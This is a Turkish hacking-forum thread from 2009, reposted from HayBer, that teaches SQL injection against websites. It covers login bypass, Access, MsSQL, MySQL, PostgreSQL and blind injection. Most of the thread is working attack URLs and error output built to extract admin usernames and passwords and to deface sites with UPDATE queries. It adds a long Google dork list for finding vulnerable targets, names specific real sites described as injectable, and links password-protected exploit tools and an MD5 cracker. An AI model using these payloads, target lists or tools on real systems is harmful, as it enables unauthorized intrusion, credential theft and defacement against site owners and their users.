SQL Injection Dersleri

●GaИo√e● · 28 Ara 2009

İlk konumuz ; SQL Injection ile Login Panelleri ByPass Etmek.
Injection kodumuz > ’ or ’
Bu kodla admin panellerine login olabiliriz.Fakat pek fazla bulunmuyor artık bu,yinede bahsedeyim dedim.
Buradaki oluşumda mantık ;
Hedef sitenin admin panelindeki kaynak kodlarıyla kolon adlarını görürüz(örnek kolon adları : username ve password olsun )
Şimdi buradaki ’or’ u kullanarak username ve password kolonlardaki boş değerleri getiriyoruz.
Bu kod çalıştığı zaman o veritabanı sistemindeki ilk kullanıcı olarak giriş yapmış oluyoruz,ki ilk kullanıcılar her zaman yöneticidir..
Örnek ;

Kullanıcı adı : ’or’
Şifre : ’or’
Giriş yaptım üstte gördüğünüz gibi.

SQL Injection - II. Ders
Access SQL Injection

Access SQL Injection çoğu zaman asp diliyle yazılmış sitelerde bulunur.
Sitemiz www.haybersqlogretiyo.com olsun.
Bu sitede ID Değeri olan linkler arayacağız SQL Injection için.
Bunları nasıl buluruz?
Mesela sitenin haber bölümü vardır.
www.haybersqlogretiyo.com/news.asp?id=2 gibi
yada başka bölümü vardır
www.haybersqlogretiyo.com/baskabibolum.asp?id=10
gibi.
İşte böyle id= değeri olan linkler arayacağız.
Bu linklerin numarasının ucuna Injection hatası almamız için " ’ ’a vs. gibi şeyler ekleyeceğiz.
Bakınız ;
www.haybersqlogretiyo.com/baskabibolum.asp?id=10"
Eğer şöyle bir hata veriyorsa o sitede SQL Injection var demektir.
----------------------------------------
Microsoft JET Database Engine error ’80040e14’
Syntax error in string in query expression ’id = 10";’.
/baskabirbolum.asp, line 7
-------------------------------
Evet SQL Injection olduğunu gördük.Şimdi ise arkadaşlar injection yapmamız için sitenin tablo adını,kolon sayısını,kolon adlarını bilmemiz gerekir.
Accessde iş tahmindir arkadaşlar,deneme/yanılma yöntemiyle birçok iş yapılır.
Şimdi ise kolon sayılarını bulacağız.
Kolon sayılarını bulmak için order+by fonksiyonunu kullacağız.
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+order+by+1
Order+by+1 dedik ekran aynı hiçbir hata yok hatta ekranda yazılar var?
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+order+by+10 dedik Fakat farklı bir ekran var.
Alınan hataya bakalım,
------------------------------------------------
Microsoft JET Database Engine error ’80040e14’
The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.
/news.asp, line 7
-----------------------------------------------
10’dan düşük kolon sayısı olduğunu belirtiyor bu hatada.
İşte böyle giderek kolon sayısını bulabiliriz.
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+order+by+9 yapalım yine aynı hatayı verdi?
Bu sefer 1 basamak daha düşürüyoruz yine aynı hatayı verdi?
işte bu hatadan başka birşey çıkarsa o kolon sayısını belirtir.
Yani son durumda ;
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+order+by+8 dedik ve başka bir ekran çıktı.

Böyle bir yazı aldık diyelim.İşte bu 8 tane kolon’un olduğunu gösterir.
Şimdi kolon sayısınıda bulduk ama, bir tek tablo adı ve o tablo adına uygun kolon adları kaldı.
Kolon sayılarını yazdık arkadaşlar ve hayber adlı tablo adını da ekledik şöyle bir hata aldık?
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+union+select+0,1,2,3,4,5,6, 7+from+hayber girdik ve böyle bir hata aldık;
---------------------------------------
Microsoft JET Database Engine error ’80040e37’
The Microsoft Jet database engine cannot find the input table or query ’hayber’. Make sure it exists and that its name is spelled correctly.
/baskabirbolum.asp, line 7
--------------------------------------
Hatamız diyorki,hayber adlı bir tablo bende bulunmuyor.
Şimdi başka tablo adları deneyeceğiz.
Yönetici vs. şifresi nerde barınır? yada haberler ? (News tablosunda,haber tablosunda gibi)
Users,user,admin,admins gibi tablo adlarında.Onları deneyelim birde.
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+union+select+0,1,2,3,4,5,6, 7+from+users
Denedik girdik ve;

Ve gördüğünüz gibi kolon sayıları ekrana yansıdı.Bu da demek oluyorki uygun bir tablo adını seçtik,şifrelerin barındığı bir tablo adı bulduk.
Şimdi ise ekrana vuran kolon sayısının yerine kolon adı yazarak admin ve şifresini almak kaldı.
Bazı kolon adları;
username,password,user,pass vs. vs. ( tabi bu her tablo adına göre değişir)
kolon adlarını yani 1 e username 2 ye de password yazdık girdik ve ;
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+union+select+0,username,pas sword,3,4,5,6,7+from+users

ve işte gördüğünüz gibi yönetici adı ve şifresi çıktı.
Üstteki yönetici adı(yani username)
alttaki de password(yani şifresi)
Accessde iş tahmindir arkadaşlar.Deneme/yanılma yöntemiyle yapıcaksınız.
Biraz uzun,karışık vs. olabilir fakat en basit ve en anlaşılır yolla anlatmaya çalıştım.Daha iyi anlamanız için ileriki saatlerde de video da çekeceğim.

Video download ;
http://s1.dosya.tc/ders_access.rar.html
Rar şifresi : HayBer

Bir de şöyle anlatayım arkadaşlar.
http://www.communication.go.ke/news.asp?id=93’
Hata verdi access sql buraya kadar tamam.
Şimdi arkadaşlar işleme başlıyoruz,
http://www.communication.go.ke/news.asp?id=93+union+select+0+from+tabloadi
Eğer buradaki tabloadi yanlışsa veya böyle bir tablo adı yoksa şöyle bi hata çıkacaktır ;
Microsoft JET Database Engine error ’80040e37’
The Microsoft Jet database engine cannot find the input table or query ’tabloadi’. Make sure it exists and that its name is spelled correctly.
/news.asp, line 7
Tabloadi adlı tablo yok demektir bu.
Buraya uygun bir tablo adı koyacağız.Mesela " news "
Koyduk ;
http://www.communication.go.ke/news.asp?id=93+union+select+0+from+news
Eğer news adlı tablo adı varsa ki bu sitede var , şöyle bir hata vericektir ;
Microsoft JET Database Engine error ’80040e14’
The number of columns in the two selected tables or queries of a union query do not match.
/news.asp, line 7
Bu demek oluyorki tablo adı doğrudur,fakat kolon sayılarını girin anlamına gelmektedir.
aynı şekilde users’de ;
http://www.communication.go.ke/news.asp?id=93+union+select+0+from+users
Girin bakın aynı hata.Neden ? Tablo adı doğru,şimdi kolon sayılarını yazarsak kolon sayıları ekrana vurucak.
yazalım onları da 8 kolon vardı (yada bilmiyorsanız order+by la öğrenirsiniz ve yazarsınız ) ;
http://www.communication.go.ke/news.asp?id=93+union+select+0,1,2,3,4,5,6,7+from+u sers
İşte gördüğünüz gibi bu kadar basit arkadaşlar.Böylece daha kolay anlayacağınızı düşünüyorum.

Video download ;
http://s1.dosya.tc/ders_access.rar.html
Rar şifresi : HayBer
Access’de arkadaşlar bir ÇOK TABLO ADI ve kolon adı (İndirmenizi mutlaka öneririm)
http://s1.dosya.tc/tablecolon.rar.html
Rar şifresi : HayBer

Access zor iş.tablo adı bulmak vs. gerçekten zor dene dene nereye kadar?
İşte bu işi kolaylaştıracak bir exploiti size sunuyorum.
Bunun videosunu çektim,exploit otomatik tablo adı tarıyor ve de metin belgesi adlı dosyaya atıyor.
Diller > ASP,PHP
ASP > Access
PHP > MySQL
Video Download ;
http://s1.dosya.tc/PerlHayBer.rar.html
Rar Şifresi : HayBer
Not : Mutlaka ama mutlaka indirin,pişman olmayacaksınız.. Otomatik kendisi access sitede tarıyor tablo adını.Üstüne üstük kolon sayısınıda.Hatta toplu bir şekilde veriyor size sadece kolon adı girmek kalıyor

Perl’i buradan indirin ;
http://www.dosya.tc/ActivePerl.rar.html
Sonra bilgisayara kurun. Ardından Perl’i D:\\\\\\\\ ye yükleyecektir galiba Siz D:\\\\\\\\de kileri direk C:\\\\\\\\’ye kopyalayın.
Yani d:\\\\\\\\ de yüklenmiş olan PERL adlı klasörü komple C:\\\\\\\\ ye atın (Kopyala - yapıştır )
Sonrada exploitleri atın c’deki perl> bin> dosyasının içine.
Ardından cmd den işlem yapın,
Yada direk cmd den D:\\\\\\\\ye geçerek de işlem yapabilirsiniz.
cmd
cd..
cd..
cd D:\\\\\\\\
cd perl cd bin scanner.pl vs. vs.

eğer c:\\\\ ye attıysanız ;
cmd
cd..
cd..
cd perl cd bin scanner.pl

MsSQL Injection
MsSQL SQL Injection İçin En Uygun Sistemdir.Çünkü MsSQL Injectionda İş Access Gibi Deneme/Yanılma Değildir.
Bir Sonuç Varsa %100 dür ( Her türlü olumlu ya da olumsuz)
Accessde iş tahmindir,fakat mssql böyle değildir.
MsSQL Injection İle çok şey yapabilirsiniz.
Mesela ?
MsSQL Root ( Root Olma )
MssQL Update (Update yapma )
MsSQL Meta ( Meta atma index yedirme )
vs. vs. bir çok şey yapabilirsiniz.
Fakat ben işin attack kısmına bakacağım.
Sitemize girdik,
www.x.com/a.asp?id=1
Sonuna ’a yazdık ve enterladık **** www.x.com/a.asp?id=1’a
Bize şöyle bir hata vermesi lazım,
---------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ’a’.
------------------------------------------------
Bu hatayı aldık mı ? İşte bu siteye her bir şeyi yapabiliriz.
Mesela?
Update yapabiliriz
Update yapılması için tablo ve kolon adlarını bilmemiz gerekir.
Sitemizin linkinin yanına having 1=1 yazalım vede tablo ve kolon adını öğrenelim.
Yani www.x.com/a.asp?id=1 having 1=1
Column ’Admin.ID’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
Şöyle bir hata aldık.Bu şu demektir.
Admin tablosunda ID adlı bir kolon var.Diğer kolon adlarını bulmak için;
Linkimizin yanına group by title having 1=1 ekleyelim.
Yani **** www.x.com/a.asp?id=1 group by title having 1=1
Böylece diğer kolonları da bulabiliriz.
Ardından aşağıdaki gibi de update yapabiliriz.
update TabloAdı set KolonAdı=’Buraya yazmak istediğiniz bir yazıyı yazın’;--
şekilde update yapabiliriz.
Tablo adlarına tek tek bakarak sitenin gizli bilgilerini(Şifre vs.) alabiliriz
Sitemizin linkinin yanına and 1=convert(int,(select top 1 name from sysobjects)) yazalım ve de karşımıza çıkan ilk tablo adını bulalım.
Yani;
www.x.com/a.asp?id=1 and 1=convert(int,(select top 1 name from sysobjects))
Şöyle bir hata vermesi lazım;
------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error ’80040e07’
Conversion failed when converting the nvarchar value ’AdminVerify’ to data type int.
------------------------------------------------------
Üstteki AdminVerify karşımıza çıkan ilk tablodur.Büyük ihtimal bütün şifreler vs. orda
Diyelim AdminVerify çıkmadı.Poll Diye bi tablo çıktı.Bu tabloda şifreler vs. yok.Ben nası ulaşabilirim?
Linkimizin yanına and 1=convert(int,(select top 1 name from sysobjects where name>’tablo adı’)) ekleyelim.Tablo adı bölümüne Üstteki İlk çıkan tablo adını yazalım ve de diğer tabloyu çıkartalım.
İşte böyle gide gide bulabiliriz.
ya da tablo adı bölümüne a yazalım.Böylece "a" karakterinden büyük olan ilk tablonun adını öğrenebiliriz.
Mesela ben bi ara u yazdım ve de users adlı bi tablo olduğunu fark ettim.
Ama yinede en garantili yok üstteki gibidir.
Şimdi kolon adı bulma,
Örnek tablomuz AdminVerify olsun.
and 1=convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype=’u’ and name=’tablo adı’)))
Linkimizin ucuna bunu ekleyelim.Sağ tarafta bulunan tablo adı yerine AdminVerify yazalım.
Böylece AdminVerify adlı tablomuzdan çıkan ilk kolon adını bulabiliriz.
üstteki colid=1 yerini colid=2 yapalım.Böylece 2. kolon adını bulabiliriz.3 yapalım , 3. kolon adını bulabiliriz.
Her şeyi bulduk diyelim.Nasıl username ve pass çıkarıcaz?
and 1=convert(int,(select top 1 KolonADı from Tablo Adı))
Linkimizin yanına bunu ekleyelim.
Kolon adı yerine kolon adımızı (Örnek : ID )
tablo adımızın yerine de tablo adını ( Örnek : AdminVerify)
İşte böylece username ve pass çıkarabiliriz.

Anlamayan arkadaşlarımız var ise MsSQL Injection - Detaylı - Son Derece Gelişmiş Bir Video ;
http://www.dosya.tc/MsSQLInj_HayBer.rar.html

SQL Injection Dork’lar burada.İstiyorsanız sizlerde koyabilirsiniz.Ben birkaçını koyuyorum;
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Bunları tek tek google’ye aratarak (Mesela www.google.com girin ordan inurl:title.php?id= bunu aratın ve de karşınıza çıkan sitelerde SQL arayın.) çıkan sitelerde Injection arayabilirsiniz.Ya da programlarınıza atarak programın aramasını sağlayabilirsiniz
Misyon Dahilinde Kullanmanız Dileğiyle
~ HayBer
Not:Alıntıdır

●GaИo√e● · 28 Ara 2009

---> SQL Injection Dersleri

SQL Injection ile ilgili yaklaşık 2-3 konu gördük. ByPass,Access,MsSQL Gibi.
Şimdi ise iş vakti Bildiklerimizi uygulama vakti.
http://www.iloveseattle.org/categories.asp?CATEGORYID=15’ > Access
http://www.vray.info/vray.asp?categoryID=1’ > Access
http://www.percussionmusiconline.com/category_info.asp?CategoryId=6’ > Access
http://www.designerclothinguk.com/display-products.asp?categoryid=20’ > MsSQL Injection
http://www.aspchapter.com/Downloads.asp?categoryid=6’ > Access
http://www.christopherwest.com/item.asp?CategoryID=11’ > MsSQL
Kolay gelsin

●GaИo√e● · 28 Ara 2009

---> SQL Injection Dersleri

Üstte bütün yaptığım sql derslerini verdim.Hepsini bir postta işledim.Şimdi ise PostgreSQL Injection’a başlıyoruz arkadaşlar.
---------------------------------------------------------------------
PostgreSQL : Normal Access,MySQL,MsSQL gibi sql dilini kullanan veritabanı sistemidir.Madem böyle bir veritabanı var işte o zaman injection’da var

Belkide bu SQL dilini çok nadir gördünüz,yada belkide hiç duymadınız..Aşağıda vereceğim video size yararlı olucaktır.
PostgreSQL ile ilgili ayrıntılı bilgiyi almak istiyorsanız buraya bakabilirsiniz.
PostgreSQL Injection - İlk Adım - Giriş Video ;

Boyutu : 829 KB ’dır.
http://s1.dosya.tc/Postgre_HayBer.rar.html
Rar Şifresi : HayBer

Not: 2. Videoda PostgreSQL Injection Hacking’i Paylaşacağım.Öncelikle bir PostgreSQL Injection Videosunu izleyin,Injection’u anlayın,ardından 2.sini vereceğim.

PostgreSQL Injection’a giriş yapmıştık, görmeyen arkadaşlar varsa indirebilirler.
PostgreSQL Injection - Adım 1 - Giriş Videosunu İndirmek İçin;
Boyutu : 829 KB ’dır.
http://s1.dosya.tc/Postgre_HayBer.rar.html
Rar şifresi : HayBer
Şimdi ise PostgreSQL Injection Hacking Tool’u Sizlerle Paylaşıyorum ;
---------------------------------------------------------------------

Şimdi ise PostgreSQL Injection’dan faydalanarak,exploit ile sitenin bütün tablo adlarını,kolon adlarını,database’ini,version’u,yönetici sifrelerini vs. her birşeyi almayı gösterdim.En Üstte Resimler vardır oralara bakabilirsiniz ki gördüğünüz üzere kullanıcı adı ve sifreleri çıkıyor(Sifreler md5 olarak) Unutmayın; her zaman ilk bulunan kullanıcı adı admindir,her zaman ilk çıkan password ise admin şifresidir.
Bu Exploit ile PostgreSQL Injection hatası veren çoğu sitenin bütün bilgilerini, her şeyi çıkarabilirsiniz.
PostgreSQL Injection Hacking Tool - Video ;
Boyutu : 1,62 MB
http://s1.dosya.tc/PostgreHack_HayBer.rar.html
Rar Şifresi : HayBer

Bir Tool’u da paylaşmamın zamanı geldi artık.
SQL Injection Hacking Tool

Program hakkında biraz bilgi vereyim;
Çok basit ve de çok kullanışlı bir SQL Injection tooldur.Videoyu izledikten sonra ne kadar basit olduğunu görüceksiniz.
Hiçbi virüs vs. yoktur.Siz Yinede Anti-Virüs programlarınızla taratabilirsiniz.
Az çok SQL Injection bilen birisi bile bu tool sayesiyle bir çok siteyi hackleyebilir.Ama Ben Bunu Sizlere Misyon Dahilinde Kullanmanız Dileğiyle Sunuyorum.Hack yapmanız için değil.
Dosyanın içinde Tool var,Video var bir de O videoyu paylaşan Fransız kişinin çektiği video var(Alternatif olarak sizlere sundum)
Program her türlü sql injection taraması yapıyor,hatta Server bilgileri bile buluyor
Tablo adları,kolon adları , vs. vs. Videoda hepsini görüceksiniz.
İşte Link ;
http://s2.dosya.tc/InjectionTooL_HayBer.rar.html

MySQL Injection - Giriş ;
MySQL Injection Çoğu zaman PHP Dilli sitelerde görülür fakat asp dilli sitelerde de az da olsa görülmektedir.
MySQL en çok kullanılan sql dilidir,çoğu web sitesi bunu kullanmaktadır.Bu yüzden Injection’u iyi bilinirse bir çok siteden bir çok veri alınabilir

MySQL’de Information_SCHEMA’da MySQL’a ait bütün veritabanı,bütün tablolar,bütün kolonlar saklanır.
Burda veriler 3 tabloda saklanır.
Veritabanları --> Information_schema.schemata
Tablolar --> Information_schema.tables
Kolonlar --> Information_schema.columns
Peki Injection nasıl yaparız?
xxx.com/salladimbirbilmemne.php?id=12
Sonuna " ’ vs. ekleriz hata alırız verdiği hata MySQL Hatasıdır.(Syntax error mysql)
Ardından order+by la aynı sekilde bir önceki derslerde nasıl kolon sayısı alıyorsak o şekil alırız.
ve kolon sayıları ekrana vurur(eğer vurmuyorsa bir hata yapmışızdır.Ya da id değerinin başına - eklersek kolon sayılarının ekrana vurmasını sağlayabiliriz)
Bkz ;
xxx.com/salladimbirbilmemne.php?id=-12+union+select+0,1,2
Yaptık ve kolon sayıları ekrana vurdu.(2 adlı kolon sayısı ekrana vurdu)
Buradan 2 yerine version() yazarak MySQL Version’unu öğrenebiliriz.
Bkz ;
xxx.com/salladimbirbilmemne.php?id=-12+union+select+0,1,version()
Buradaki mysql version’una göre site üzerindeki bütün tablo adlarını tek bir yazımla alabiliriz.(bununla ilgili ayrıntılı bilgiyi ilerde vereceğim.)
Bu site üzerindeki bütün veritabanını öğrenmek için(Tabi bu version’a bağlı) ;
xxx.com/salladimbirbilmemne.php?id=-12+union+select+0,1,schema_Name+from+information_s chema.schemata
Bu site üzerindeki tabloları tek tek limit arttırarak öğrenmek için;
xxx.com/salladimbirbilmemne.php?id=-12+union+select+0,1,table_name+from+information_sc hema.tables+limit+1,1
Burada limit+1,1 i limit+2,1 yaparak 2. tabloya bulabiliriz.2 yi 3 3 ü 4 yaparak da diğer tabloları da bulabiliriz.
Bu site üzerindeki tablo adlarına göre kolon adlarını öğrenmek için;
xxx.com/salladimbirbilmemne.php?id=-12+union+select+0,1,column_name+from+information_s chema.columns+where+table_name=’tabloadi’
diğer kolon adlarını da görmek için sonuna;
+limit+1+offset+1 eklemeliyiz.
Not: Şu an MySQL Injection’a giriş yaptım,video çekerek bu işi daha kolaylaştıracağım..ve bu işin daha üstesine giderek mysql’da bir çok şeyi sizlere sunacağım.
Saygılarımla

MySQL Videosu çekilmiştir arkadaşlar.
MySQL’u full bir biçimde anlattım,kolay bir dille.Mysql version 5 lerde neler yapabileceğimizi,tek seferde bütün tabloları listelediğimizi,kolon adlarını alırken tablo adını hexleyerek kolon adlarını bulmayı gösterdim.Bir de Mysql 4 versionlarda neler yapabileceğimizi.
Size bir hediyem de var arkadaşlar,Kullandığım Hex’e çevirme programını da içine kattım.
MySQL Injection FuLL Download ;
http://www.dosya.tc/mysqlhayber.rar.html
Rar Şifresi : HayBer

Blind SQL Injection
Blind SQL Injection,Kör SQL Enjeksiyon demektir.
Site sahibi hata kodlarını kapatır hemde görünmeyecek bir şekilde.İster .htaccessden ya da direk php kodlarla farketmez ama filtrelemez çekilen veriyi.
Örnek site ?
www.uydurdumbirsite.com/x.php?id=11
sonuna " vs. hata kodlarını ekledik hiçbişe yok.Hata vermiyor.İşte üstteki demek istediğim şey bu.Site sahibi kapatmış hata kodlarını
Ama yinede SQL Yiyebilir.(Asp php farketmez hepsinde olabilir)
Sonra da and 1=1 ekledin(Yani www.uydurdumbirsite.com/x.php?id=11 and 1=1)
www.uydurdumbirsite.com/x.php?id=11 ile aynı sayfayı verdi.
Bu sefer and 1=0 ekledin fakat www.uydurdumbirsite.com/x.php?id=11 burda gözüken sayfa ile farklı bir sayfa çıktı
Bu demek oluyor ki bu id değerinden istediğin veriyi çekebilirsin diyor.
İşte burada Blind SQL arayabilirsiniz.
Blind sql injection da bir enjeksiyon türünün ne olup olmadığını(access mi mssql mu vs.vs.) bilemezsin.Tahmin edersin.
Nelerle ? İpucularla ?
Access Hatası Veren Bir Site Nasıl Çıkar ? vs. gibi gibi..
Order by çektin kolon sayısını buldun ki bu kolon sayısından eminsin fakat hata aldın.
Burada 2 ihtimal vardır. Ya access ya da oracle.
Eğer order by çektikten sonra kolon sayısı ekrana yansıdıysa versiyon istediğiniz zaman hata vermiyorsa o zaten mysql’dir. (Örnek : 5.0.24-standard )
sonuna /* -- vs. ekleyin kolon sayıları ile birlikte.Böylece kolon sayısının ekrana vurmasını sağlayın.

Blind SQL Injection Video ;

http://www.dosya.tc/BlindSQL_HayBer.rar.html

Unhex kavramıyla version alabilirsiniz. Bkz ;
http://www.wfsj.org/news/news.php?id=-110+union+select+0,1,2,3,4,5,6,unhex(hex(version() )),8,9

S.A. Arkadaşlar.
SQL Injection’da kolon sayılarını order+by la bulduk ve yazdık.Fakat hata verdi yada bomboş bir ekran var? Yani bu da demek oluyor ki kolon sayıları ekrana yansımadı.(Aynen Üstteki Gibi)
Ne yapmamız gerekir? Kolon sayılarından da eminiz ama neden böyle oldu ki?

Sizce en üstteki durumdan bu üstteki duruma nasıl getirdim? Evet fonksiyon koydum fakat başka şeyler de yaptım..(Mesela daha kolaylaştırıcı şeyler

)
Her türlü bilgi,püf nokta,detay ve ayrıntılı bilgi videomdadır.
Video boyutu : 877 KB
İndir ;
http://s1.dosya.tc/Kolon_HayBer.rar.html
Rar Şifresi ;
HayBer

SQL Injection’da Tablo ve Kolon Adını Sallarız Değil Mi ? Ya da Atarız.Ya Tutarsa Misali.
İşte Bu Videoda Bunu Kesin ve %100 Güzel,Pratik,Kolay Bir Yöntemle Gösterdim.
Herkesin İzlemesini İstiyorum.
MsAccess(Halk dili : Syntax error veren siteler) , MySQL,MsSQL Farketmez Arkadaşlar.Çoğunda oluyor Bu.
Ki Ben Çoğunu Bu Yöntemle Buldum.

Video Anlatım ve Video Download ;
http://s1.dosya.tc/TabloKolon_HayBer.rar.html
İçinde Anlatım Dosyası ve Video + Beni Oku dosyası vardır.Beni Oku Dosyasına ve de Anlatım dosyasına mutlaka bakın.Bir şeyi söylemeyi unuttum o orada yazıyor.

Advanced MySQL Injection - BLind SQL Injection(Bir nevi)
O kadar çok zorlukla karşılaşıyorum,halbuki hepsi çok zor gibi görünen fakat o kadar basit geçilen yerlerki..
Son derece gelişmiş bir videodur.Normal basit sistemlerden tablo adlarını kolon adlarını alıp fieldleri çekmeye benzemez.
Sayfa yönlenir(hata verir) yılmaz yine yönlenir yine yılmaz fonksiyonlar koyar anlarki burda birşeyler var..
Videonun Boyutu 1,44 MB’dır.
Video Download ;
http://www.dosya.tc/Advanced_HayBer.rar.html

Bu arada Md5 Kırmak isteyen arkadaşlar size bir hediyem var.Injection’da Çoğu zaman sifreler md5 olarak çıkar.
Md5 Cr4cker v1.5

Neden Bu ?
md5’i tek tek internet sitelerinde kıracağınıza direk bu programda kırabilirsiniz.6,7 md5 online kırma sitesi var,tek tek onlara atacağınıza burda md5i en üstte bulunan yere yazın,o size kırmaya çalışsın.Kırarsa yanında password yazıcaktır
Hem pratiktir,hem kolaydır.ve de md5 de oluşturur(Create)
Ayrıntılı Bilgi Altta vermiş olduğum dosyadadır.
Cracker:
Gdataonline
md5decryption
Hashkiller
Passcracking
Insidepro
md5crack
md5Live
md5hood
Icebreaker
Securitystats
Options:
Create md5
Crack md5
Save(Export)
Tray Icon
Clear
Start Options:
"-stext Hash C:\\\\log.txt"
Download:
http://s1.dosya.tc/Md5Crack_HayBer.rar.html
Rar Şifresi : Code Hunters

http://www.ocxdump.com/download-ocx-.../download.html

hata alanlar bunu indirsin

Evet. bi deneme yapalım.....
Link ;
http://www.bozar.be/activity.php?id=8686
Şimdi hata alalım sonuna " vs. ekleyelim,
404 hatası..
bakalım blind sql varmı
EVet var. and 1=1 denedik aynı sayfa and 1=0 denedik farklı sayfa.
Order by çektik
http://www.bozar.be/activity.php?id=8686+order+by+17
17 de 404 sayfasının geldiğini gördük.Demekki 16 kolon var.
Kolonları yazdık ;
TIKLAYIN
Ve gördüğünüz gibi kolon sayıları ekrana vurmadı.Ne yapıcaz fonksiyon ekleyeceğiz..
1,2 ye user() ekleyelim aynı
2,3 e ekledik ve ;
TIKLAYIN
İşte gördüğünüz gibi.
Bu da heykırlara gelsin login ve password

TIKLAYIN

4MinoRMacH1Né · 28 Ara 2009

---> SQL Injection Dersleri

teşekkürler

SQL Injection Dersleri

●GaИo√e●

●GaИo√e●

●GaИo√e●

4MinoRMacH1Né

Hard Work Beats Talent

Gizliliğinize değer veriyoruz